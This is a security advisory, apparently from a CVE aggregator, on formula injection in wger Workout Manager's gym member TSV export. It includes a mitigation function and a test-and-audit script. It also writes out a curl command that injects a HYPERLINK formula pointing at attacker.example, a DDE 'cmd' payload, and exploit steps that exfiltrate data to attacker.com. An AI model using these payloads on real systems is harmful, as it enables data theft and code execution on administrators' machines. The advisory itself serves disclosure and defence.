wger Workout Manager, CSV/TSV Formula Injection Vulnerability


The vulnerability is a CSV/TSV formula injection (CWE-1236) in wger Workout Manager. The gym member TSV export endpoint writes the `first_name` and `last_name` profile fields verbatim to TSV cells. The export function uses Python's `csv.writer`, which does not escape spreadsheet formula triggers: `=`, `+`, `-`, `@`, `\t` and `\r`.

Any gym member can set their `first_name` or `last_name` to a malicious formula, because the profile edit endpoint stores arbitrary strings without sanitization. The formula is stored in the database and reproduced in every subsequent TSV export. When a gym admin later exports the member list and opens the file in Excel, LibreOffice Calc, or Google Sheets, the formula executes in the admin's local spreadsheet context. This allows data exfiltration via the `HYPERLINK` or `WEBSERVICE` functions. On legacy Excel with DDE enabled, arbitrary local code execution is possible using payloads like `=cmd|'/c calc.exe'!A1`.

The vulnerable code is in `wger/gym/views/export.py` at approximately line 73. The affected endpoint is GET /en/gym/export/users/<gym_pk>. The recommended fix is to prepend a single quote to any cell value beginning with a formula trigger; the OWASP-recommended mitigation is to sanitize all user-supplied fields before exporting.

DailyCVE Form

Platform: wger Workout Manager
Version: latest (Docker)
Vulnerability: Formula Injection
Severity: High
Date: April 28 2026

Prediction: May 28 2026

What Undercode Say:

Inject formula payload into profile:

  curl -X POST "http://target/en/user/1/overview" \
    -H "Cookie: sessionid=member_session" \
    -d "first_name=%3DHYPERLINK%28%22http%3A%2F%2Fattacker.example%2Fx%3Fp%3D%22%26A1%2C%22click%22%29"

Vulnerable code in wger/gym/views/export.py (line 73):

  writer.writerow([
      user.id,
      gym.name,
      user.username,
      user.email,
      user.first_name,  # written verbatim - no sanitization
      user.last_name,   # written verbatim
      ...
  ])

Mitigation: sanitize cell values

  FORMULA_PREFIXES = ('=', '+', '-', '@', '\t', '\r')

  def sanitise_cell(value):
      # Coerce to text; None becomes an empty cell.
      s = str(value) if value is not None else ''
      # A leading formula trigger gets a single-quote prefix so the
      # spreadsheet treats the cell as literal text rather than a formula.
      if s and s[0] in FORMULA_PREFIXES:
          return "'" + s
      return s

  writer.writerow([
      ...
      sanitise_cell(user.first_name),
      sanitise_cell(user.last_name),
      ...
  ])
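To make the fix testable end to end, the following is an added, self-contained Python example (not wger's own code) that reproduces a member export the way `csv.writer` emits it, once without and once with the advisory's sanitisation, and adds an audit helper that flags any cell a spreadsheet would interpret as a formula. The member rows, including the formula string that stands in for a member-supplied `first_name`, are constructed sample data; `export_members`, `find_formula_cells` and `parse_tsv` are names chosen for this example. The audit helper is also the check to run against existing exports or stored profile fields before deciding the fix is in place.

```python
import csv
import io

# Characters that make Excel / LibreOffice Calc / Google Sheets treat a cell
# as a formula. Same list as the advisory's mitigation snippet.
FORMULA_PREFIXES = ('=', '+', '-', '@', '\t', '\r')

# Constructed sample rows. The formula text in member 2 is plain data here;
# nothing in this script evaluates it.
SAMPLE_MEMBERS = [
    {"id": 1, "username": "alice", "email": "alice@example.invalid",
     "first_name": "Alice", "last_name": "Smith"},
    {"id": 2, "username": "mallory", "email": "mallory@example.invalid",
     "first_name": '=HYPERLINK("http://attacker.example/x?p="&A1,"click")',
     "last_name": "Jones"},
    # A leading '-' is enough to trigger formula parsing, so ordinary-looking
    # input is also caught by the audit.
    {"id": 3, "username": "bob", "email": "bob@example.invalid",
     "first_name": "-Bob", "last_name": "O'Neil"},
]


def sanitise_cell(value):
    """Neutralise spreadsheet formula triggers in one cell value (advisory's fix)."""
    s = "" if value is None else str(value)
    if s and s[0] in FORMULA_PREFIXES:
        return "'" + s          # single-quote prefix forces literal text
    return s


def _verbatim(value):
    """What the vulnerable export does: pass the stored string straight through."""
    return "" if value is None else str(value)


def export_members(members, sanitise=True):
    """Render the member list as TSV text.

    sanitise=False reproduces the vulnerable behaviour (csv.writer writes
    user-controlled strings verbatim); sanitise=True routes each
    user-controlled field through sanitise_cell() first.
    """
    cell = sanitise_cell if sanitise else _verbatim
    buf = io.StringIO()
    writer = csv.writer(buf, delimiter="\t")
    writer.writerow(["id", "username", "email", "first_name", "last_name"])
    for m in members:
        writer.writerow([m["id"], m["username"], m["email"],
                         cell(m["first_name"]), cell(m["last_name"])])
    return buf.getvalue()


def parse_tsv(tsv_text):
    """Read TSV text back into a list of rows (csv handles quoted cells)."""
    return list(csv.reader(io.StringIO(tsv_text), delimiter="\t"))


def find_formula_cells(tsv_text):
    """Audit an export: return (row, column, value) for every cell whose
    first character is a formula trigger. Row 0 is the header line."""
    findings = []
    for row_idx, row in enumerate(parse_tsv(tsv_text)):
        for col_idx, value in enumerate(row):
            if value and value[0] in FORMULA_PREFIXES:
                findings.append((row_idx, col_idx, value))
    return findings


if __name__ == "__main__":
    vulnerable = export_members(SAMPLE_MEMBERS, sanitise=False)
    print("unsanitised export flags:", find_formula_cells(vulnerable))
    fixed = export_members(SAMPLE_MEMBERS, sanitise=True)
    print("sanitised export flags:", find_formula_cells(fixed))
```

Note that `csv.writer` wraps the sanitised cell in double quotes (the value contains `"`), which is why the audit parses the TSV with `csv.reader` instead of splitting on tabs: the check must see the cell as the spreadsheet will, not the raw bytes on the line.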

Exploit:

  1. As a gym member, set `first_name` to a formula like =HYPERLINK("http://attacker.com/x?p="&A1,"click").
  2. Wait for a gym admin to export the member list via GET /en/gym/export/users/<gym_pk>.
  3. The exported TSV contains the formula in the `first_name` column for that member.
  4. When the admin opens the TSV in Excel, the formula executes, sending data to the attacker.

Protection from this CVE

  • Apply the `sanitise_cell` function to all user-supplied fields before exporting.
  • Upgrade to the latest patched version of wger when available.
  • Open TSV exports in a text editor instead of a spreadsheet application.
  • Disable DDE (Dynamic Data Exchange) in legacy Excel installations.

Impact

  • Data Exfiltration: Adjacent PII can be sent to an attacker-controlled server.
  • Local Code Execution: Arbitrary commands can be run on the admin’s workstation (legacy Excel).
  • Phishing: Admins can be redirected to attacker-controlled sites.


Sources:

Reported By: github.com
Extra Source Hub:
Undercode
